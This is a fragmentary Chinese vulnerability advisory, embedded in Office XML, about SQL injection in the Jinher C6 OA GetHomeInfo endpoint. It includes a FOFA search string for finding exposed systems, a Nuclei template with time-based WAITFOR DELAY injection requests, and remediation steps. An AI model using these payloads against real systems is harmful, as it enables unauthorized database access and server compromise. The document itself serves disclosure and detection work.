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金和-c6 gethomeinfo sql注入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金和-c6 gethomeinfo sql注入，黑客可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。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app="金和网络-金和OA" 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2120900"/>
            <wp:effectExtent l="0" t="0" r="127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界面如下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614295"/>
            <wp:effectExtent l="0" t="0" r="317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Nuclei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id: jinher-c6-HomeService-sqli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jinher-c6-HomeService-sqli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author: msk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severity: high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raw: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|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GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:0%27-- HTTP/1.1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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36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Connection: close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|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GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:2%27-- HTTP/1.1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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36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Connection: close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matchers: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type: dsl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condition: and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dsl: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- duration_2 &gt; duration_1 &amp;&amp; contains_all(body,'?xm','Sex','ToRead')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升级到安全版本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2、如非必要，禁止公网访问该系统。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3、设置白名单访问。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3CF3F4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C33CF3F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84B205C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="484B205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CEE027D"/>
    <w:rsid w:val="14423DE3"/>
    <w:rsid w:val="1CCC6101"/>
    <w:rsid w:val="32BF6C49"/>
    <w:rsid w:val="36B83D65"/>
    <w:rsid w:val="5D284EF1"/>
    <w:rsid w:val="638C697C"/>
    <w:rsid w:val="6BCE3108"/>
    <w:rsid w:val="6F61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2024-01-03T01:56:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-03T02:46:48Z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7E7AE92845D042E4BF71D59D8D40BA53_12</vt:lpwstr>
  </property>
</Properties>
</file>